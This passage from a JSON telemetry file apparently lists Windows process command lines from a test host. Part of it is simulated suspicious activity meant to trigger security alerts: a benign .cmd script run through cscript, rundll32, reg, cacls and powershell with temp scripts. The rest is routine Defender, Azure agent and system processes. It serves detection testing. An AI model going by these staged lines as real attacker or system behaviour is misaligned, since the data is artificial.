c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -10858 \",\"ping  127.0.0.1 -n 26 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 5 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\3567\\\\28584.exe\",\"ping  127.0.0.1 -n 15 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -30051 c:\\\\temp\\\\10517\\\\32030.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -30051 c:\\\\temp\\\\10517\\\\32030.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 15 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25563 /10689\",\"ping  127.0.0.1 -n 15 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4674\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -12105 \",\"ping  127.0.0.1 -n 15 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"rundll32  \\\\17279\\\\3548.exe\",\"ping  127.0.0.1 -n 15 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22572 c:\\\\temp\\\\10720\\\\13334.ps1\",\"ping  127.0.0.1 -n 15 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 2 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 2 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 9 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"NaN\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"NaN\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"NaN\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"NaN\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -787 c:\\\\temp\\\\15711\\\\13331.ps1\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"NaN\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"NaN\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke\",\"\\\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe\\\" /q WD\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\90875AAA-9256-468E-A6B3-041D325C6594\\\\MpSigStub.exe /stub 1.1.15500.2 /payload 1.285.1240.0 /program C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe /q WD\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignaturesUpdateService -ScheduleJob -UnmanagedUpdate\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" GetDeviceTicket -AccessKey 71EBA1DC-4B6E-DCAE-B047-570DC49235AF \",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SpyNetService -RestrictPrivileges -AccessKey AB4A7F64-6DA7-5DB5-6481-327860FAE09C\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SpyNetService -RestrictPrivileges -AccessKey AB4A7F64-6DA7-5DB5-6481-327860FAE09C -Reinvoke\",\"NaN\",\"wmiadap.exe /D /T\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2796\\\" \\\"6368\\\" \\\"6636\\\" \\\"6380\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\wuauclt.exe\\\" /RunHandlerComServer\",\"\\\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe\\\" WD /q\",\"C:\\\\Windows\\\\system32\\\\MpSigStub.exe /stub 1.1.15500.2 /payload 1.285.1230.0 /MpWUStub /program C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe WD /q\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2796\\\" \\\"3216\\\" \\\"6432\\\" \\\"6404\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"